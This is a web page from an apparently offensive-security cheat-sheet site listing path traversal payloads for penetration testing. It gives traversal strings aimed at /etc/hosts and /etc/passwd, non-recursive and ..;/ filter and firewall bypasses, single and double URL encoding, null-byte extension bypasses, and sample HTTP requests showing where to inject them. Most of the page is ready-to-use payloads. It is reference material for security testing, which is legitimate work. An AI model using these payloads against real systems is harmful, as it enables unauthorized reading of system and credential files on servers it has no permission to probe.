LOGO
OFFENSIVE | DEFENSIVE | WIKI | ABOUT

[DIRECTORY/PATH TRAVERSAL]







GENERAL COMMANDS
DESCRIPTION:  Collection of commands to use when testing for path/directory traversal.

C1: ../../../../etc/hosts
C2: 3-1 METHOD ..././..././..././..././..././..././..././..././etc/hosts | non-recursively
C3: /etc/hosts | absolute path bypass
	
Try: 

* Nullbyte | %00
* Encoding 
* Double Encoding 
* UTF-8 Encoding

 |  | 

WAF bypass

C4: ..././etc/hosts
C5: ..;/etc/hosts
	
 | 




URL-DECODING
NOTE: It is important to encode one, two, three times, it will be slow but it is important to test if exist any encoding that can be 
used to bypass the control. [burpsuite > crtl + u (encode) | ctrl + shift + u (decode)]

SAMPLES:

 > encoded 1 time
C1: ..%2f..%2f..%2fetc/hosts
	
 > encoded 2 times
C2: ..%252f..%252f..%252fetc/hosts

 | 





VALIDATIONS
 > SPECIFIC PATHS

SAMPLE: 

GET /image?filename=/var/www/img/24.jpg HTTP/2
Host: machetevault.github.io
Cookie: session=j5QWoOCqRn5B2jGgronDtpWr6Vz055yb

NOTE: Sometimes exist some kind of validations as countermeasure to avoid path traversal. Maybe it is expecting same path and is 
only validating that, so, attempts can be executed. [absolute, encoded, non-recursive, etc.]

SAMPLE: GET /image?filename=/var/www/images/../../../etc/passwd 
	
C1: ../../../../etc/hosts



 > FILE EXTENSION

NOTE: 
	
1. If it is validating the extension, it will be needed to intercept the request > send request to repeater and change the extension.
2. Check headers to see if there's some place providing what it is accepting.

NULL VALIDATION

You can use the value %00 to test for null validation. Sometimes you can find that vulnerability when the application is retrieving 
images, files and more. 

SAMPLE: GET /image?filename=../../../etc/hosts%00.png HTTP/2



	
	
NOTE:  
	
1. All can be tested with 1, 2, or any segments [../] as needed all applications will behave different. If needed, SNIPER ATTACK! 
(or similar). Also, invert the symbol, use backslash and try it. ["..\"]

2. It is good to enable all columns in burpsuite to see the entire picture. [MIME Type Filters]

CHECK THE FOLLOWING LINK, >>> FILE SYSTEM >>> It can be used to check valuable files per OS.

©® - 2023/2024.